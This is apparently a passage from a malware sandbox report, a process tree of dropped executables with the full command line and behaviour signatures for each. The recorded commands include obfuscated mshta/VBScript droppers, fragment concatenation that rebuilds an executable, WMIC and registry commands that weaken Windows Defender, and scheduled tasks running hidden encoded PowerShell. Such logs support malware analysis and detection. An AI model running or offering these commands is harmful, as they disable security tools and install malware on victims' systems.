      - PID 4268: C:\Users\Admin\Documents\mdz2Qc8uAQmPH5Q51Ox0Lsha.exe
        Command line: "C:\Users\Admin\Documents\mdz2Qc8uAQmPH5Q51Ox0Lsha.exe"
        - PID 7148: C:\Windows\SysWOW64\mshta.exe
          Command line: "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\mdz2Qc8uAQmPH5Q51Ox0Lsha.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\mdz2Qc8uAQmPH5Q51Ox0Lsha.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
          - PID 5568: C:\Windows\SysWOW64\cmd.exe
            Command line: "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\mdz2Qc8uAQmPH5Q51Ox0Lsha.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\Documents\mdz2Qc8uAQmPH5Q51Ox0Lsha.exe" ) do taskkill -F -Im "%~nXU"
            - PID 4448: C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
              Command line: SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
              - PID 3644: C:\Windows\SysWOW64\mshta.exe
                Command line: "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
                - PID 7084: C:\Windows\SysWOW64\cmd.exe
                  Command line: "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
              - PID 1244: C:\Windows\SysWOW64\mshta.exe
                Command line: "C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
                - PID 6168: C:\Windows\SysWOW64\cmd.exe
                  Command line: "C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
                  - PID 2460: C:\Windows\SysWOW64\cmd.exe
                    Command line: C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
                  - PID 3896: C:\Windows\SysWOW64\cmd.exe
                    Command line: C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                  - PID 1288: C:\Windows\SysWOW64\control.exe
                    Command line: control .\FUEj5.QM
                    - PID 2128: C:\Windows\SysWOW64\rundll32.exe
                      Command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
                      Signatures: Loads dropped DLL
                      - PID 2192: C:\Windows\system32\RunDll32.exe
                        Command line: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
                        - PID 4152: C:\Windows\SysWOW64\rundll32.exe
                          Command line: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
                          Signatures: Loads dropped DLL
            - PID 6796: C:\Windows\SysWOW64\taskkill.exe
              Command line: taskkill -F -Im "mdz2Qc8uAQmPH5Q51Ox0Lsha.exe"
              Signatures: Suspicious use of NtCreateProcessExOtherParentProcess; Kills process with taskkill
      - PID 3240: C:\Users\Admin\Documents\nfE_fUZjR5paPR7MbxI6KJrs.exe
        Command line: "C:\Users\Admin\Documents\nfE_fUZjR5paPR7MbxI6KJrs.exe"
        - PID 6360: C:\Windows\SysWOW64\WerFault.exe
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 1744
          Signatures: Program crash; Enumerates system info in registry
      - PID 4076: C:\Users\Admin\Documents\OUuhUnNTGfrMVidogDjLBMaq.exe
        Command line: "C:\Users\Admin\Documents\OUuhUnNTGfrMVidogDjLBMaq.exe"
        - PID 1604: C:\Users\Admin\AppData\Local\Temp\tmp7B8A_tmp.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\tmp7B8A_tmp.exe"
          Signatures: Suspicious use of SetThreadContext
          - PID 6888: C:\Users\Admin\AppData\Local\Temp\tmp7B8A_tmp.exe
            Command line: C:\Users\Admin\AppData\Local\Temp\tmp7B8A_tmp.exe
      - PID 6096: C:\Users\Admin\Documents\vsvchNX79eSDzY6jf6F89_MI.exe
        Command line: "C:\Users\Admin\Documents\vsvchNX79eSDzY6jf6F89_MI.exe"
        Signatures: Executes dropped EXE; Checks BIOS information in registry; Checks whether UAC is enabled; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses
        - PID 6920: C:\Users\Admin\Documents\vsvchNX79eSDzY6jf6F89_MI.exe
          Command line: "C:\Users\Admin\Documents\vsvchNX79eSDzY6jf6F89_MI.exe"
      - PID 1084: C:\Users\Admin\Documents\7ixm251g7LXOO6MxPCZytSeW.exe
        Command line: "C:\Users\Admin\Documents\7ixm251g7LXOO6MxPCZytSeW.exe" /mixtwo
        - PID 3736: C:\Windows\SysWOW64\WerFault.exe
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1084 -s 264
          Signatures: Program crash; Checks processor information in registry; Enumerates system info in registry
      - PID 5532: C:\Users\Admin\Documents\JIp6LHWayvf6eqcKiqEoX_B2.exe
        Command line: "C:\Users\Admin\Documents\JIp6LHWayvf6eqcKiqEoX_B2.exe"
      - PID 4968: C:\Users\Admin\Documents\atehf_dX9HmosZlbwm9KoeTG.exe
        Command line: "C:\Users\Admin\Documents\atehf_dX9HmosZlbwm9KoeTG.exe"
        - PID 5144: C:\Windows\SysWOW64\WerFault.exe
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 272
          Signatures: Program crash; Checks processor information in registry; Enumerates system info in registry
      - PID 1016: C:\Users\Admin\Documents\e18m_dzotOho9LFg_lZFdOTK.exe
        Command line: "C:\Users\Admin\Documents\e18m_dzotOho9LFg_lZFdOTK.exe"
        - PID 1912: C:\Users\Admin\AppData\Local\Temp\7zS7418.tmp\Install.exe
          Command line: .\Install.exe
          - PID 3900: C:\Users\Admin\AppData\Local\Temp\7zS7F62.tmp\Install.exe
            Command line: .\Install.exe /S /site_id "668658"
            Signatures: Checks BIOS information in registry; Drops file in System32 directory; Enumerates system info in registry
            - PID 6176: C:\Windows\SysWOW64\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
              Signatures: Blocklisted process makes network request; Executes dropped EXE
              - PID 7020: C:\Windows\SysWOW64\forfiles.exe
                Command line: forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                - PID 6328: C:\Windows\SysWOW64\cmd.exe
                  Command line: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                  - PID 4896: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Command line: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                    - PID 1648: C:\Windows\SysWOW64\Wbem\WMIC.exe
                      Command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
              - PID 6316: C:\Windows\SysWOW64\forfiles.exe
                Command line: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                - PID 6172: C:\Windows\SysWOW64\cmd.exe
                  Command line: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                  - PID 3772: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Command line: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                    - PID 7144: C:\Windows\SysWOW64\Wbem\WMIC.exe
                      Command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
              - PID 6640: C:\Windows\SysWOW64\forfiles.exe
                Command line: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                - PID 3668: C:\Windows\SysWOW64\cmd.exe
                  Command line: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                  - PID 6384: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Command line: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                    - PID 16212: C:\Windows\SysWOW64\Wbem\WMIC.exe
                      Command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
              - PID 5912: C:\Windows\SysWOW64\forfiles.exe
                Command line: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                - PID 6616: C:\Windows\SysWOW64\cmd.exe
                  Command line: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                  - PID 4420: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Command line: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                    - PID 4512: C:\Windows\SysWOW64\Wbem\WMIC.exe
                      Command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
            - PID 6196: C:\Windows\SysWOW64\forfiles.exe
              Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
              - PID 3948: C:\Windows\SysWOW64\cmd.exe
                Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                - PID 5236: \??\c:\windows\SysWOW64\reg.exe
                  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                - PID 7112: \??\c:\windows\SysWOW64\reg.exe
                  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
            - PID 6932: C:\Windows\SysWOW64\forfiles.exe
              Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              - PID 4268: C:\Windows\SysWOW64\cmd.exe
                Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                - PID 6124: \??\c:\windows\SysWOW64\reg.exe
                  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                - PID 6884: \??\c:\windows\SysWOW64\reg.exe
                  Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
            - PID 7056: C:\Windows\SysWOW64\schtasks.exe
              Command line: schtasks /CREATE /TN "gyOKhjCNy" /SC once /ST 06:14:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
              Signatures: Creates scheduled task(s)
              - PID 3644: C:\Windows\System32\Conhost.exe
                Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            - PID 6816: C:\Windows\SysWOW64\schtasks.exe
              Command line: schtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 13:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\NeIRTzU.exe\" uG /site_id 668658 /S" /V1 /F
              Signatures: Creates scheduled task(s)
C:\Users\Admin\Documents\3_LT0gGnQ5FKIT2FlE0lBEkk.exe"C:\Users\Admin\Documents\3_LT0gGnQ5FKIT2FlE0lBEkk.exe" silent4⤵PID:2480
-
-
C:\Users\Admin\Documents\4azU_c07QucZGrH2hrEOw9YR.exe"C:\Users\Admin\Documents\4azU_c07QucZGrH2hrEOw9YR.exe"4⤵PID:5252
-
C:\Users\Admin\AppData\Local\Temp\is-B4TPO.tmp\4azU_c07QucZGrH2hrEOw9YR.tmp"C:\Users\Admin\AppData\Local\Temp\is-B4TPO.tmp\4azU_c07QucZGrH2hrEOw9YR.tmp" /SL5="$70218,506127,422400,C:\Users\Admin\Documents\4azU_c07QucZGrH2hrEOw9YR.exe"5⤵
- Loads dropped DLL
PID:5976 -
C:\Users\Admin\AppData\Local\Temp\is-IT2JP.tmp\Sharefolder.exe"C:\Users\Admin\AppData\Local\Temp\is-IT2JP.tmp\Sharefolder.exe" /S /UID=27096⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:1068 -
C:\Program Files\MSBuild\PJQXQGAGPE\foldershare.exe"C:\Program Files\MSBuild\PJQXQGAGPE\foldershare.exe" /VERYSILENT7⤵PID:6364
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 9768⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6960
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6364 -s 9888⤵
- Program crash
PID:5752
-
-
-
C:\Users\Admin\AppData\Local\Temp\8a-189b3-1b3-af1a1-c2e7664e0a9b6\Cohelesaecy.exe"C:\Users\Admin\AppData\Local\Temp\8a-189b3-1b3-af1a1-c2e7664e0a9b6\Cohelesaecy.exe"7⤵PID:2448
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e68⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:5324
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb98f46f8,0x7ffcb98f4708,0x7ffcb98f47189⤵PID:4248
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:29⤵
- Executes dropped EXE
PID:5852
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:39⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6624
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3084 /prefetch:89⤵PID:7140
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:19⤵PID:5756
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:19⤵PID:5736
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:19⤵PID:6432
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:19⤵PID:7312
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:19⤵PID:7324
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4268 /prefetch:89⤵PID:8064
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4268 /prefetch:89⤵PID:8116
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5636 /prefetch:29⤵PID:8896
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:19⤵PID:9440
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:19⤵PID:9608
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5760 /prefetch:89⤵PID:12232
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:19⤵PID:12860
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:19⤵PID:13044
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5936 /prefetch:89⤵PID:13176
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2004 /prefetch:89⤵PID:13584
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:19⤵PID:5572
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:19⤵PID:5844
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,6471879383018463372,3425324034024168203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1744 /prefetch:89⤵PID:6288
